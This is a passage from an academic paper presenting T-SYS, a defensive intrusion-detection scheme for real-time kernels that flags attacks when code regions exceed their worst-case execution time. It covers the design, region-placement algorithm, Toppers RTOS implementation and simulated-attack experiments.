- Experiments comparing T-SYS to existing WCET-based security methods are conducted, comparing their ability to detect malware attacks, as well as their performance impact compared to the unmodified kernel and a previous timing-based security method.
They show clear benefits of T-SYS over prior work in terms of lower overhead, user-configurability and elasticity.

2 RELATED WORK
As cyber-physical systems have become increasingly important to 24/7 operations of critical infrastructure, so has the importance of protecting them against cyberattacks [13, 23]. In response to the increasing prevalence of and need for security in real-time systems, a number of new ideas have emerged to meet the unique challenges of real-time security. This section aims to provide an overview of existing contributions to security in the domain of real-time systems, with particular focus on methods that incorporate timing information as part of their protection. The purpose of this overview is to determine what options currently exist for protecting real-time systems, and what problems in the field T-SYS is best suited for. Prior work on intrusion detection in real-time systems has taken a variety of approaches [12]. Many of these methods are focused on increasing security at the network level, as the increasing use of networks in real-time systems presents an expanding attack surface [28]. While conventional and embedded network protection methods complement T-SYS, the most closely related methods are based on the principle of intrusion detection via timing anomalies. These methods leverage the unique timing constraints inherent to real-time systems as a means to identify attacks. Designing a real-time system inherently entails gathering timing information on the various components that comprise it [4]. Since sufficiently complex attacks are liable to generate timing anomalies, some protection methods incorporate this information into their intrusion detection strategies by identifying timing anomalies [31]. It is this category that T-SYS falls into. Bellec et al. [10] created a protection method that employs a region-based approach, tracking the time spent executing regions. Their method employs specialized hardware to monitor execution. The regions used by Bellec are single-entry, single-exit nested regions.
The hardware tracks execution through these regions by monitoring a cycle count-down register initialized upon region entry, and tracks nested regions via a stack structure with associated timer save/restore operations. They also provide an algorithm for automatically dividing target code into regions based on the control-flow graph of the code, which we compare T-SYS to in Section 7. T-SYS differs in its criteria for region selection (non-nested, single-entry/multi-exit), as well as in providing elasticity in its timing bounds through the MaxVuln parameter to determine the largest allowable region size. Zimmer et al. [34] developed a set of methods for providing security in an RTOS exploiting precise timing information to detect attacks. T-Rex is a checkpoint-based system that relies on fine-grained timing information (single clock cycle resolution) to detect buffer overflow attacks on function return and other straight-line execution paths of application code. T-ProT is a coarser-grained protection using synchronous checkpoints to validate, for each task, that a milestone in execution is reached by some expected time. T-AxT is integrated with the scheduler and supports asynchronous, periodic checks of a task's program counter value, to ensure that it is within the appropriate range. Of these, T-SYS is most outwardly similar to T-ProT in that both use timers to bound a block of code. However, T-ProT implements its timer checkpoints via scheduler invocations, while T-SYS uses function calls to instrument code. This allows T-SYS to provide integrated protection within both application and kernel code and across their intersection instead of just application code, which creates novel challenges in that the control flow of a protected region may originate in the context of one task but lead to that of another task. T-SYS also supports elastically sized vulnerability windows as opposed to the more rigid constant-sized regions of T-ProT.
Traditionally, the effect of kernel paths in real-time systems has been estimated fairly pessimistically [22], taking the WCET of the syscall to be that of the longest path the call could possibly take through the kernel. Prior work [15] has modeled RTOS kernel paths using control-flow graphs (CFGs). These CFG models were then integrated with the existing CFG of the userspace programs (crossing the kernel-application boundary) to create a more complete CFG of the user task. By including kernel paths, previously-independent CFGs of different tasks could be connected, thereby creating a whole-system CFG. Methods of WCET analysis have been developed to tighten bounds by incorporating system state information preceding system calls [16]. Information about system states is combined with prior analysis of individual kernel paths' WCETs as well as the conditions for taking these paths. In combination, such information yields tighter bounds on the response time of system calls and, transitively, application tasks.

3 ATTACK MODEL AND SCENARIO
There are a multitude of ways in which real-time systems can come under attack. Much of the research in real-time security focuses on identifying attacks at the network level [19, 21]. In this work, a general model is presented for the attack that T-SYS is designed to detect, together with a model for the system itself, with a focus on defining how the kernel handles interrupts and what hardware features are made available. We assume the existence of a high-precision monotonic counter provided by the hardware and available to be programmed by the kernel. This counter is write-protected and can only be modified via a kernel call, preventing an attacker from being able to modify it without returning to the kernel.
We further assume that the attacker has managed to compromise the user data space. The attacker's goal is to hijack the control flow of the system in order to execute malicious code under elevated permissions, and then return undetected. We assume that the attacker cannot modify hardware factors or protected kernel memory. An attacker under these limitations may still be able to divert kernel execution, e.g., by triggering a buffer overflow within kernel code.

4 DESIGN
The primary objective of T-SYS is to detect intrusions, thereby allowing the system to respond rapidly to such an intrusion, e.g., by switching into a safe mode or shutting down a node entirely, but the exact response to the attack is outside the scope of this paper. Our approach to intrusion detection relies on tracking the execution time of code regions during runtime, and detecting when a region's execution time has exceeded its statically-determined WCET budget. Code regions are bounded by instrumentation points (IPs). The use of worst-case execution time to construct these bounds (over less pessimistic estimates) is paramount, as by definition a code region's execution time will never exceed its WCET. Thus, we can assume that a region exceeding its WCET bound indicates the presence of an attack. The algorithms for generating regions (and thereby placing IPs) from a control-flow graph annotated with WCET information and with an elastic timing bound are discussed in Section 5. In a software-based implementation, IPs are implemented as system calls when inserted into application-level code, and as simple function calls when added inside kernel paths. This provides the necessary level of data protection to the IP code by ensuring that important data (e.g., timing bounds or IP return addresses) reside in a different address space than application code, reducing an attacker's ability to tamper with this information. In a hardware implementation, a dedicated component tracks the program counter and executes all the functions of the IP (setting up timer, raising alarm) once the PC reaches an IP, without extra code added to the application or kernel path.
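The core detection idea (a region that runs past its WCET budget signals diverted control flow) can be sketched in a few lines of C. This is a simplification under assumed names (`ip_enter`, a simulated cycle counter): the real design arms a hardware timer that fires asynchronously when the deadline passes, whereas this sketch only notices an overrun at the next IP, purely for illustration.

```c
#include <stdbool.h>
#include <stdint.h>

/* Simulated-time sketch of T-SYS's core check: a region that runs past
 * its WCET budget indicates diverted control flow. Names and the
 * simulated clock are illustrative, not the paper's implementation. */
static uint64_t deadline;      /* absolute deadline, in cycles; 0 = unarmed */
static bool alarm_raised;

void ip_enter(uint64_t now, uint64_t region_wcet) {
    /* reaching an IP before the old deadline simply re-arms the timer */
    if (deadline != 0 && now > deadline)
        alarm_raised = true;   /* previous region overran its WCET budget */
    deadline = now + region_wcet;
}
```

In the actual design the alarm would be raised by the timer interrupt itself, so diverted code that never reaches another IP is still caught.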
In this paper, we focus on a software implementation of T-SYS since it is applicable to today's hardware, as implemented in our experimental evaluation.

4.1 Protection Model
T-SYS identifies timing anomalies along execution paths. Execution paths are represented as regions of contiguous basic blocks within the system's control flow graph, having a single entry and one or more exit points (in contrast to more constrained single-exit control flow [10], which does not match C/C++ control flow with break within loops). As every basic block within the CFG is associated with exactly one region, successors of an exit point of one region represent entry points for subsequent regions. Execution time is tracked via IPs placed at region boundaries. Because regions are pairwise disjoint with an empty intersection in basic blocks (in contrast to nested regions [10]), each IP is associated with exactly one region. Figure 1 shows a sample CFG with 4 IPs and color-coded regions associated with each one. At each IP, a timer with a deadline equal to the longest path through the associated region (i.e., the longest time before reaching another IP) is set up. IPs are placed at the beginning of the first block in a region. Notice that program profiling/tracing [6, 8, 9, 20] places instrumentation in a basic block anywhere within a path, and often not at the top, which is one of several differences between T-SYS and profiling/tracing. Concrete rules for dividing a CFG into regions are discussed in Section 5.

Figure 1: CFG with WCETs per block, regions denoted by color, with instrumented blocks labeled by letter, where the pathWCET table contains timeout deadlines for each region.

Figure 1 shows a CFG with its four IPs, along with WCETs per basic block. The table to the right shows the WCET bound for each IP. On encountering the first IP, the next IP reached could be either of two IPs, where it reaches one in either case after 15 ms (the length of the first IP's basic block). Both blocks directly following contain IPs.
As IPs are always placed at the start of a block, the length of the containing block is included. For the second IP, the same case is seen with a WCET of 35 ms. At the third IP, however, there are two paths to the next IP, with WCETs of 10 ms and 25 ms, respectively. The longest of the possible paths defines the IP deadline, so the timer there is set to 25 ms. Consider the effect of executing injected code of an attack that diverts from the expected control flow. Upon reaching an IP, a call is made to set up a timer, with a deadline equal to the WCET distance to the next IP. When the control flow is diverted off the path to the next IP, execution continues until the timer deadline is reached. When this happens, an interrupt is triggered, flagging an intrusion. With no diversion, the next IP would be reached before the deadline, and the timer would be reprogrammed with a new deadline. Also consider an attack using a suspend-and-resume strategy, where the attack is split up into multiple parts, suspending its own execution and returning to the diverted region to avoid allowing the total region execution time to exceed the timer deadline. In this case, every fragment of the attack would need to fit within the vulnerability window for the region. Given that the size of this window changes each time the region is executed (due to caching or control flow differences), the attacker would need to guarantee that they are always diverting back to the region with enough time left to finish execution within the deadline.

4.2 Interrupt Handling
Consider a user-level task executing in a system involving multiple tasks of varying priority in a preemptively scheduled system. The execution of application code may be interrupted and then temporarily suspended while execution is transferred to a higher-priority task. In general, the exact time and the location in the application where the interrupt occurs cannot be statically determined, as preemptions may be asynchronously triggered.
To account for asynchronous actions, it is necessary for the operating system's interrupt handler to interface with the T-SYS timer when interrupting a T-SYS protected task. When an interrupt arrives during the execution of a T-SYS protected application, the remaining time left for the current timer is recorded in kernel (i.e., protected) memory. The timer is then canceled before the rest of the interrupt is processed. Similarly, when returning execution to a protected task, the interrupt handler must reinstate the T-SYS timer with the recorded remaining time plus some constant to account for the overhead associated with handling the interrupt before the timer is paused, as well as for returning from the interrupt after resetting the timer. However, this overhead is constant and can therefore be directly credited to the T-SYS timer within the timer resume operation. If T-SYS is integrated into the kernel, the interrupt handler may contain an IP that sets up a new timer to protect a kernel region, e.g., to handle the interrupt or to call the dispatcher. This case is discussed further in Section 6.

4.3 Instrumentation Points
At each IP, the return address is read from the call stack and checked for validity against a table of known valid return addresses. If invalid, an attack is flagged by raising an alarm. Otherwise, the return address is used to extract the IP's unique ID by indexing into the pathWCET table, which contains the relevant region WCETs (and thus relative timer deadlines) for each IP. The pathWCET table is stored in protected kernel memory, and its contents are hard-coded at compile time by the ROSE-based implementation tool. A timer is then set up for this deadline. This timer setup operation also cancels the timer for the previous IP encountered. Pseudocode for instrumentation points is shown in Listing 1.
Listing 1: Instrumentation Point Pseudocode

void inst_point():
    ret_addr = get_return_address()
    if !is_valid_addr(ret_addr):
        alarm()
    point_id = get_pid(ret_addr)
    current_time = get_timestamp()
    deadline = current_time + pathWCET[point_id]
    setup_timer(deadline)

IPs are represented in application code as system calls, and in kernel code by singular function calls. The return address checking prevents attackers from evading detection by inserting their own IPs into malicious code. Since the return address is unique to each IP, it can be extracted at compile time.

5 PLACEMENT OF IPS
A tool to support automatically implementing protection into arbitrary code, both user and kernel, is provided. To this end, the ROSE [27] compiler framework was utilized to create an instrumentation tool from a specification that incorporates previously acquired timing information, control-flow analysis and a vulnerability threshold, MaxVuln. This tool automatically divides the control flow graph of a given codebase into regions based on the user-specified maximum vulnerability threshold, MaxVuln, and places IPs in desired locations throughout. Use of the user-specified MaxVuln parameter supports elasticity with respect to instrumentation granularity. Furthermore, this tool is capable of performing loop transformations to reduce the overhead of instrumentation. A prerequisite for utilizing our instrumentation tool is that the developer has extracted worst-case execution time information for each basic block in the system. The difficulty of this process is largely dependent on which method is used to acquire basic block WCETs. Extraction of timing information was performed experimentally for this work, but other implementations of T-SYS may use any method available, including static WCET analysis tools [32]. T-SYS is agnostic to how basic block WCETs are extracted and will work with any method, so there is no need to specify a precise method for determining the WCET of a basic block.
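Under simplifying assumptions, Listing 1 can be rendered as runnable C. The return address is passed as a parameter instead of being read from the call stack, `setup_timer` is reduced to recording a deadline, and the table contents (`valid_ret`, `pathWCET`) are invented for illustration.

```c
#include <stdbool.h>
#include <stdint.h>

/* Runnable rendering of Listing 1. The real IP reads the call stack and
 * programs a hardware timer; here the return address is a parameter and
 * the timer setup just records the deadline. Table contents are made up. */
#define NUM_IPS 3
static const uintptr_t valid_ret[NUM_IPS] = {0x1000, 0x2000, 0x3000};
static const uint32_t  pathWCET[NUM_IPS]  = {15, 35, 25}; /* region WCETs */
static uint64_t armed_deadline;
static bool alarm_flag;

static int get_pid(uintptr_t ret) {            /* return address -> IP id */
    for (int i = 0; i < NUM_IPS; i++)
        if (valid_ret[i] == ret) return i;
    return -1;
}

void inst_point(uintptr_t ret_addr, uint64_t current_time) {
    int id = get_pid(ret_addr);
    if (id < 0) { alarm_flag = true; return; } /* unknown caller: attack */
    armed_deadline = current_time + pathWCET[id];
}
```

Because an attacker-inserted call site has no entry in `valid_ret`, it trips the alarm rather than arming a fresh deadline, which is exactly the evasion the return-address check closes off.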
Our tool provides elastic instrumentation, which takes the granularity of instrumentation as an input, in terms of cycles, to denote the vulnerability threshold MaxVuln. This allows the user to directly specify the minimum frequency of IPs rather than deriving this value indirectly from other user parameters, as is the case in other methods [10, 34]. The tool also supports basic block instrumentation (by simply treating every block as a separate region), which we used as a first-order approximation of WCET bounds, later refined in a second-order pass over regions with multiple blocks. This step achieves much tighter bounds on the WCET of each region.

5.1 Placement Algorithm
To place IPs, all basic blocks within a CFG are assigned into contiguous regions. Each region represents a section of code over which a given timer will be active. From here on, we refer to partitioning the CFG into regions as coloring it; blocks of the same region share a color, which is unique to that region. Regions created must follow a particular set of rules governing their structure to support instrumentation placement for timing protection:
- A basic block must share its color with either all of its children, or with none of them.
- A basic block must share its color with either all of its parents, or with none of them.
- A region may have only one entrance block.
- The WCET of the longest path through a region must not exceed the MaxVuln threshold.
- MaxVuln must be greater than or equal to the WCET of the longest basic block. (If finer granularity were needed, one could even dissect a block into multiple blocks.)
By these rules, a single basic block may constitute a region. Once the CFG is partitioned into regions, an instrumentation point is placed at the beginning of the first basic block per region.
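As a small sketch of the first coloring rule above, the following hypothetical helper checks that a block shares its color with either all of its children or with none of them. A full validity checker would also cover the parent rule, the single-entry property, and the longest-path WCET against MaxVuln; the flat color-array encoding here is ad hoc.

```c
#include <stdbool.h>

/* All-or-none rule for one block: its color must match either every
 * child's color or no child's color. child_colors holds the region
 * colors of the block's n successors (encoding is illustrative). */
bool children_all_or_none(int my_color, const int *child_colors, int n) {
    int same = 0;
    for (int i = 0; i < n; i++)
        if (child_colors[i] == my_color) same++;
    return same == 0 || same == n;
}
```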
Such a block exists because, as per the region structure requirements defined above, each region will have a single entry point. Placement is always performed at the top of a basic block for two reasons: 1) Placement in the middle of a basic block would divide the execution time between two regions, but given that timing information is stored at the granularity of single basic blocks, it would be unclear how this time should be divided up. 2) Placement at the end of a basic block would be complicated due to branch instructions whose time needs to be accounted for, yet the IP cannot be placed after them since they affect the program counter. In order to properly handle loops within a given CFG, a preprocessing step is necessary during which each loop is represented as a single (compound) block. In the event that the loop's total WCET is larger than MaxVuln, the compound block will initially be treated as having an indefinite WCET. (We use this property in our algorithm to force it being treated as its own region when first creating regions.) Once the remainder of the CFG has been divided into separate regions, the loop's CFG will then be passed into our algorithm as a single compound object (without further internal analysis). Loop bounds are expected to be statically bounded, either explicitly by a constant bound that can be statically evaluated at compile time or by user hints/pragmas to provide such a constant. For such a constant number of iterations of a loop and a total WCET not exceeding MaxVuln, the compound block will be treated as having the same WCET as the loop it represents. In the event that the loop bounds are not available (and thus cannot be evaluated at compile time), the algorithm will assume the loop's total WCET is larger than MaxVuln and thus follow the behavior for long loops outlined in the preceding paragraph.
In addition, the loop structure may be transformed into a semantically equivalent one to ensure low instrumentation overhead, which is discussed in subsection 5.5. Once this preprocessing step is complete, the CFG is partitioned according to the 3-step algorithm outlined below:
(1) Regions are created delimited by dominator and post-dominator blocks, which are uniquely colored with respect to other regions.¹
(2) All interior blocks of a region beyond the delimiter blocks are colored with their region color.
(3) Regions are combined within the MaxVuln threshold and region property requirements to reduce the total number of regions and thus instrumentation overhead.
¹A dominator block in a CFG indicates a prior block execution must have passed through to reach the current block, whereas a post-dominator indicates a block execution will have to pass through after leaving this block, i.e., these blocks denote must-information [5].
Pseudocode of the placement algorithm is given in the appendix, along with a proof sketch for correctness and a complexity analysis. Figure 2 depicts the coloration of a control flow graph after each step in the point placement process. The CFG displayed was taken from the ext_tsk kernel path, a portion of the scheduler within the Autosar/OSEK-compliant Toppers RTOS [33], which was instrumented as part of the evaluation in Section 7.

Figure 2: CFG after each step in coloring regions of the CFG for the Toppers scheduler.

5.2 Partial Regions
In the Partial Regions step, only some of the blocks in the CFG are colored in; others are left uncolored, with no region membership. The objective of this step is to generate single-entry, single-exit regions within the CFG. A depth-first traversal of the CFG is performed. At each uncolored block, a list of the node's post-dominators is acquired. Any block in this list that does not have the current block as a dominator is removed from it. The resulting pruned list is then sorted by distance from the current block (where distance represents WCET), with the furthest entry first (the remaining blocks, if any, can be ordered this way [26], as the furthest block will also be a post-dominator for all earlier blocks in the list). For each remaining block in the pruned list, a depth-first algorithm is used to determine the longest path (in terms of worst-case execution time) between the current block and that candidate exit. If the computed region WCET is less than the MaxVuln parameter, then all of the blocks between them are assigned a single color, and the depth-first traversal of the CFG continues from the candidate exit. In the event that none of the blocks in the list pass the criteria above (i.e., the current block is not a dominator for any of its post-dominators, or no post-dominator is found with a longest path of less than MaxVuln), or the block has no post-dominator, no blocks will be colored and the depth-first traversal of the CFG continues. This process is complete once every node in the CFG has been checked. As seen in the first graph of Figure 2, only some blocks are colored after step 1 (here, 40% of the blocks are colored; uncolored nodes are shown as white, with a black background). Listing 2 in the appendix shows the pseudocode for the Partial Regions step.

5.3 Filling Regions
The Filling Regions step colors all remaining blocks that were left uncolored by the previous Partial Regions step. This eventually results in a fully colored CFG. The method begins with a depth-first traversal of the CFG. When an uncolored block is encountered, it is colored. After coloring a block, an attempt is made to grow the new region by painting all of its successors with the same color. This attempt can only succeed if, for every successor:
- the successor is uncolored,
- the successor has no parents of a different color than the current block (including uncolored blocks), and
- adding the successor to the region will not create a path through the region that exceeds MaxVuln.
These rules ensure that any region created in this manner will (1) not interfere with the regions created in the previous step, and (2) obey the rules for region structure defined previously. If the growth attempt succeeds, all successors obtain the predecessor's color, and growth attempts start for each newly-colored block in a breadth-first fashion. If the growth attempt fails, then the algorithm resumes looking for uncolored blocks to start new regions.
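The longest-path WCET that both steps compare against MaxVuln can be computed by a depth-first search over the candidate region's DAG of basic blocks. The sketch below hard-codes a four-block diamond (an assumed example, not a CFG from the paper) whose two paths have differing WCETs.

```c
#include <stdint.h>

/* Sketch: longest-WCET path through a small DAG region, the quantity
 * compared against MaxVuln when forming a region. Hard-coded diamond:
 * block 0 -> {1, 2}, blocks 1 and 2 -> {3}; per-block WCETs in wcet[].
 * -1 marks an absent successor. */
#define NBLOCKS 4
static const uint32_t wcet[NBLOCKS] = {15, 10, 25, 5};
static const int succ[NBLOCKS][2]   = {{1, 2}, {3, -1}, {3, -1}, {-1, -1}};

uint32_t longest(int b) {               /* DFS over the DAG from block b */
    uint32_t best = 0;
    for (int i = 0; i < 2; i++) {
        int s = succ[b][i];
        if (s >= 0) {
            uint32_t l = longest(s);
            if (l > best) best = l;
        }
    }
    return wcet[b] + best;
}
```

Here the path through block 2 (15 + 25 + 5 = 45) dominates the path through block 1 (15 + 10 + 5 = 30), so 45 is the value a timer deadline or a MaxVuln check would use.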
The second graph in Figure 2 depicts the state of the CFG after the Filling Regions step is complete. Note that every block in the graph has been colored at this point. The previously described process corresponds to the pseudocode in Listing 3 within the appendix.

5.4 Region Adjustment
The final phase, Region Adjustment, optimizes the graph to reduce the number of IPs placed. This reduces the required size of the pathWCET table, which also reduces performance overhead in a software implementation of T-SYS (where IPs have associated execution time overhead). Region Adjustment uses the same dominator/post-dominator pair method from the Partial Regions step to identify potential regions. However, only region exit blocks that do not share a color with any sibling blocks (i.e., successors of the block's predecessor) are checked as possible new entry points. If a viable region is identified, then a check is performed to determine if creating the new region will reduce the total number of regions within the CFG. If so, then all blocks within the region are repainted a new color, making them part of the new region. The check for reduction simply involves counting the number of unique colors identified among the prospective region's blocks. If it is more than 3, or if the new region contains a superset of the blocks in at least 2 regions (as is the case in Figure 2), then the check succeeds and the region is created. Pseudocode for this is shown in Listing 4 in the appendix. We refer to this algorithmic approach of delimiting regions as elastically sizing regions: our automated process allows users to call the instrumentation tool with their preferred MaxVuln threshold, which could even differ from task to task depending on a task's real-time criticality.
5.5 Loop Transformation by Thresholding
The process of instrumenting loops opens up an interesting problem with regard to the cost of IPs. Specifically, how can a loop be efficiently instrumented when multiple loop iterations can pass within the MaxVuln time limit, but the total number of iterations makes the loop exceed MaxVuln? When a single loop iteration can be longer than MaxVuln, the loop's internal structure can be instrumented using the 3-step method from above. But the 3-step method does not allow IPs to occur on every k-th loop iteration due to the region constraints. Instead, each loop iteration would trigger an IP, which increases T-SYS overhead. Our solution to this problem is to transform the loop into a nested loop with a single IP on top of the outer loop and all of the logic of the untransformed loop placed in an inner loop. We bound the number of inner loop iterations such that it will not exceed MaxVuln. We limit loop transformations to loops with statically known iteration bounds so that the transformation can be performed at compile time. An example of this transformation's effect on the loop CFG is depicted in Figure 3. The blue segment represents the original loop. The outer loop (orange segment) contains an additional IP (highlighted in yellow) and a conditional branch (enclosed in green) that determines the number of inner loop iterations to execute on a given iteration of the outer loop. The dynamic number of instructions increases slightly due to upper bounds calculations for the inner loop, but this overhead is easily compensated by the lower number of IPs.

Figure 3: CFG of a loop before and after the loop thresholding transformation.

Consider an untransformed loop with N iterations, where at least k iterations can execute within the MaxVuln time limit. After the loop transformation, the resulting outer loop will iterate M times, where M = floor(N/k) + 1. The inner loop will iterate n = k times, except for the final iteration of the outer loop, where n = N - k(M - 1).
The value of the inner loop bound on the final outer loop iteration may be lower than during others to account for the case where the total iteration count is not an integer multiple of the inner loop bound. Handling this case is the reason for including the conditional statement within the outer loop. Note that the calculation for the inner loop bound must take into account the additional time spent calling the IP and executing the branch statement as well as the outer loop return, and so it will be smaller than the exact value of MaxVuln divided by the iteration WCET.
5.6 Generation of IPs
Once the process of transforming loops and partitioning the CFG into regions has completed, we may begin actually placing instrumentation points into the code. First, the completed CFG is re-formed by expanding any loops that were reduced to a single compound block and instrumented separately back into their original form. Subsequently, a single call to the IP function is inserted at the beginning of every basic block that does not share a color with its parents (i.e., the beginning of each colored region). In addition, a table is generated relating each IP to its associated region's WCET. This WCET data is then populated into the table (see Section 4), which is stored in protected kernel memory.
6 IMPLEMENTATION
We implemented the design using the ROSE [27] compiler to generate a T-SYS instrumentation for user/kernel source code and subject it to timing experiments with different MaxVuln parameters exploiting the elasticity of our tool.
We utilized an Autosar/OSEK-compliant [2, 3] RTOS, Toppers [1, 29], that is commercially deployed by Suzuki (among others) for automotive systems adhering to ISO 26262 [18] and MISRA-C [24] requirements. In particular, we employ the Toppers RTOS (EV3RT) version with available source code targeting a 32-bit ARM 9 processor clocked at 300 MHz featuring 16 KB instruction and 16 KB data caches in experiments [30].
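The IP-placement rule from Section 5.6 (insert an IP at the start of every block whose color differs from all of its parents, and record the region's WCET in the table) can be sketched as follows. This is an illustrative Python model under assumed data structures: the CFG is a map from block id to predecessor list, and `region_wcet` maps each color to its region's WCET; none of these names come from the paper's code.

```python
def place_ips(cfg, color_of, region_wcet):
    """Return the blocks that receive an IP call and the IP -> WCET table.

    cfg: block id -> list of predecessor block ids.
    color_of: block id -> region color.
    region_wcet: region color -> worst-case execution time of that region.
    """
    ip_blocks, table = [], {}
    for block, preds in cfg.items():
        # entry blocks (no predecessors) trivially satisfy the condition
        if all(color_of[block] != color_of[p] for p in preds):
            ip_blocks.append(block)                    # IP at start of block
            table[block] = region_wcet[color_of[block]]
    return ip_blocks, table
```

In the real system the resulting table is stored in protected kernel memory so the budgets cannot be tampered with from user code.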
We created a software implementation of T-SYS within Toppers, including all of the components outlined in Section 4. Syscalls for application-embedded IPs were added, along with reserved space for the path WCET table. Modifications to the interrupt handler were made in order to handle pausing and resuming timers for interrupted tasks.
Actual tool-based integration of instrumentation points was performed on several CPS benchmark applications as well as within the Toppers kernel itself in order to ensure protection across the user-kernel boundary. Implementations were performed using various MaxVuln levels. The task sets instrumented included a selection of tasks from PapaBench [14, 17, 25] with benchmarks from the open-source Paparazzi UAV codebase and selected Malardalen WCET Benchmarks. All instrumentation of IPs in kernel and application code was performed using our ROSE-based placement tool.
A high-precision, write-protected monotonic counter is a requirement for T-SYS, as discussed in Section 3. Most existing hardware platforms provide components that meet this need [12]. Toppers does not innately provide such a device; however, the AM1808 processor of the hardware platform used for testing features an eCAP (enhanced CAPture) module, which can be configured to act as a monotonic counter that generates an interrupt upon reaching a programmable deadline [30]. This device was used in our implementation of T-SYS within Toppers. In the general case, the difficulty of adding support for the T-SYS timer will depend on the precise details of the system being modified. In particular, if the timer hardware is already employed by the RTOS for another purpose, then additional modifications will be needed to multiplex it so as to add T-SYS support while retaining existing OS timers. In the Toppers case, the eCAP module was not being used, so modifications were straightforward.
Modifications to the Toppers interrupt handler were made to handle preemptions of T-SYS protected tasks. The task control block (TCB) structure was extended with a field to store the remaining timer budget at the time of interruption. The timer is reinstated upon task resumption, using the remaining budget time plus a constant amount of additional time to account for the overhead associated with the interrupt handler diverting execution before processing the timer pause. The additional time required was measured at 25 cycles in our implementation. Using the TCB to store T-SYS related data is safe as the TCB is part of kernel (i.e., protected) memory.
In case an interrupt initiates an instrumented kernel path, the T-SYS timer is recorded, and the diverted execution reaches an instrumentation point within the handler marking the entry into the protected section of kernel code. By recording the timer, we can credit the known execution time of the kernel path back to the task upon returning from the interrupt.
In the event that a context switch occurs during the kernel path (as would be likely during a scheduler interrupt), everything up to the dispatcher is considered part of the interrupted task's execution. Once the dispatcher is invoked, the timer's budget is recorded again, in order to be replaced (and credited with the needed extra time) once we return from the dispatched task. Another crediting operation is issued upon return from the interrupt back into the interrupted user task, using the recorded timer value from when the interrupt first arrived.
In addition to the minimum support required for handling protected applications (i.e., syscalls for instrumentation points and other modifications mentioned above), kernel paths related to mutex handling and those related to context switching were instrumented by applying T-SYS protection across the kernel/user boundary to ensure end-to-end protection across the runtime of an entire task set. The instrumented kernel paths constituted task entry/exit, mutex lock/unlock operations, and scheduler interrupts.
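The budget save/restore mechanism described above can be modeled in a few lines. This is a hypothetical simulation sketch, not the Toppers C code: `Timer` stands in for the eCAP-backed countdown timer, the `TCB` field mirrors the extension described in the text, and the 25-cycle credit is the measured handler-entry overhead reported above.

```python
OVERHEAD = 25  # cycles credited back for interrupt-handler entry overhead

class Timer:
    """Stand-in for the hardware countdown timer used by T-SYS."""
    def __init__(self):
        self.budget, self.running = 0, False
    def start(self, budget):
        self.budget, self.running = budget, True
    def stop(self):
        self.running = False
    def remaining(self):
        return self.budget

class TCB:
    """Task control block extended with a saved-budget field (kernel memory)."""
    def __init__(self):
        self.saved_budget = None

def on_interrupt(tcb, timer):
    tcb.saved_budget = timer.remaining()   # pause: record remaining budget
    timer.stop()

def on_resume(tcb, timer):
    # reinstate the timer, crediting the constant handler-entry overhead
    timer.start(tcb.saved_budget + OVERHEAD)
```

Storing the saved budget in the TCB mirrors the design choice in the text: the TCB lives in protected kernel memory, so an attacker in user space cannot inflate the budget.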
7 EXPERIMENTAL EVALUATION
The elasticity of the placement algorithm described in Section 5 supports experiments for a variety of applications with different timing requirements to be instrumented using a varying MaxVuln parameter to conform to the timing bound requirements of each application. Our experiments focus on demonstrating the ability of T-SYS to detect timing anomalies using simulated intrusions. These experiments were performed using benchmark task sets and feature detection at both user and kernel levels.
We select benchmarks from the CPS PapaBench suite with minor modifications to adhere to the Toppers kernel API, and additional benchmarks from the Malardalen set. PapaBench is based on the real-world Paparazzi code base, an open-source framework for UAVs (e.g., quad-copters). It provides a good testing ground for emulating the protection method's behavior in a realistic environment, particularly in the realm of cyber-physical systems. We modified PapaBench to make it compatible with the Toppers RTOS. PapaBench features precedence constraints, data exchange, synchronization and context switches between tasks, which allowed us to test the effectiveness of T-SYS protection inside the kernel, as well as within user tasks. The Malardalen tasks were used for comparison to the Bellec algorithm (as it was tested using the same benchmarks). PapaBench tasks were run together as a real-time task set, as they share mutex-protected data, while tasks from the Malardalen benchmark set were run separately (i.e., one task in the system at a time).
We further compare our T-SYS implementation with Bellec et al. [10]. Our analysis compares intrusion detection capabilities as well as the number of instrumentation points executed at runtime for a software instrumentation of both. Notice that the Bellec algorithm is rigid while T-SYS supports elasticity in the maximum allowed vulnerability.
Because of this, we use the rigid Maximum Attack Width (MAW) value by Bellec as a base MaxVuln value for each benchmark. We then present additional data for multiples of this value to demonstrate the benefits of T-SYS's elastic nature.
Tasks from PapaBench which were instrumented include servo_transmit, send_data_to_autopilot (shortened to autopilot), and navigation. These modified PapaBench tasks incorporate context switches and mutual exclusion locks to facilitate task communication. These properties were used to assess T-SYS's ability to detect intrusions to the kernel. Benchmark tasks from the Malardalen set were fft, cnt, lms, st, edn, statemate, qsort-exam and adpcm. For both benchmark sets, we also assessed the sensitivity to timing overhead induced by T-SYS, analyzing performance under different MaxVuln levels.
Figure 4: Minimum attack vulnerability vs. MaxVuln for Malardalen tasks.
Figure 5: Minimum attack vulnerability vs. MaxVuln for PapaBench tasks.
7.1 Attack Detection Experiments
These experiments demonstrate T-SYS's efficacy in detecting attacks while monitoring the time of protected regions under execution, both within and outside the kernel. As MaxVuln defines the upper bound on T-SYS timer deadlines, it is impossible for an attack with an execution time greater than MaxVuln to go undetected (see Section 4). These experiments focus on determining the longest attack capable of bypassing T-SYS for a given MaxVuln level.
Simulated attacks were conducted against T-SYS protected tasks using various MaxVuln values. These simulated attacks were conducted by inserting function calls with known execution times into the tasks after instrumentation. Attacks were always placed immediately after the IP at the top of the longest region in the tested task or kernel path. This is the worst case for an attack to occur, as it gives the longest time window for the attacker.
By varying the length of the intruding function calls, we simulate attacks of different lengths. This was leveraged to assess how the MaxVuln parameter affects attack detection. Thus, for each value of MaxVuln shown in the table, the simulated attack length was increased in 5 µsec increments until an attack length was found that always resulted in intrusion detection after 100 attack attempts. The simulation of kernel attacks (Figure 6) followed the same principle.
The results of this experiment are depicted in Figures 4 and 5. The results show that increasing MaxVuln leads to an increase in the minimum observed detectable attack in most cases. This reflects an increase in the size of protected regions and their variability in execution time. If the gap between BCET and WCET is large, attackers have an easier time intruding, as less time spent inside the loop provides more slack for the attacker to exploit: as long as the execution time of the original code plus that of the attack does not exceed the region's WCET, the attack will not trigger any alarms. As MaxVuln is increased, regions encompass more basic blocks with larger differences between BCET and WCET.
